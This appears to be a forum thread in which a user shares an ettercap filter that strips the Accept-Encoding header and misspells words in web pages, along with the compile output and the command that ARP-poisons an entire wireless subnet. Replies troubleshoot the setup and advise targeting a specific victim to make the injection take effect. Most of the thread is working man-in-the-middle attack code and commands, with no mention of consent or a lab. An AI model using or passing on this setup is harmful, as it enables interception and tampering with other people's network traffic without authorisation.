Results 1 to 4 of 4

Thread: ettercap filter problem

  1. #1
    Member imported_pynstrom's Avatar
    Join Date
    May 2008
    Posts
    143

    Default ettercap filter problem

    I've read a couple of tutorials from the ettercap forums and from irongeek, and created a small filter to misspell two commonly used words:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
          msg("accepting rubbish\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("the", "teh");
       replace("The", "Teh");
       replace("THE", "TEH");
       msg("the filter ran.\n");
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("and", "adn");
       replace("And", "Adn");
       replace("AND", "ADN");
       msg("and filter ran.\n");
    }
    Note: I've also tried replacing "and" & "the" in the same function.

    The filter compiles just fine:

    Code:
    ~# etterfilter -o /root/filter.ef misspell.filter
    
    etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
     12 protocol tables loaded:
            DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
     11 constants loaded:
            VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
     Parsing source file 'misspell.filter'  done.
     Unfolding the meta-tree  done.
     Converting labels to real offsets  done.
     Writing output to 'filter.ef'  done.
     -> Script encoded into 25 instructions.
    Then I run ettercap in text mode

    Code:
    ~# ettercap -Tq -i wlan0 -F filter.ef -M arp // //
    
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Content filters loaded from filter.ef...
    Listening on wlan0... (Ethernet)
    
     wlan0 ->       00:c0:ca:25:0a:f4       192.168.1.3     255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %
    
    7 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : ANY (all the hosts in the list)
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    Text only Interface activated...
    Hit 'h' for inline help
    When I surf the internet on a separate box connected to the same network the filter msg runs as if the filter worked, but the text on the target machine is unaffected. I compared to the filter used in irongeek's tutorial and I don't see any difference. Could someone give me a shove in the right direction. Thank you for your time.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    I had the same problem to fix when it says help press -h then -p and type chk_posion(and check the computer to posion shouldn't show up, if it does) then type reposion_arp then check that its not listed with chk_posion.

    hope it helps

  3. #3
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Well first of all your code does seem to be correct and as it compiles without errors there should be no problem with it. Have you tried to specify the victim instead of running the script for all clients on the subnet?

    I have noticed this same problem with the script apparently running but no change seen on the victim PC when you do not specify the victim.
    -Monkeys are like nature's humans.

  4. #4
    Member imported_pynstrom's Avatar
    Join Date
    May 2008
    Posts
    143

    Default

    Quote Originally Posted by =Tron= View Post
    Have you tried to specify the victim instead of running the script for all clients on the subnet?

    I have noticed this same problem with the script apparently running but no change seen on the victim PC when you do not specify the victim.
    The obvious has never been my strong suit. I always seem to spend too much time looking for a complicated answer. Thanks for your help Tron.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •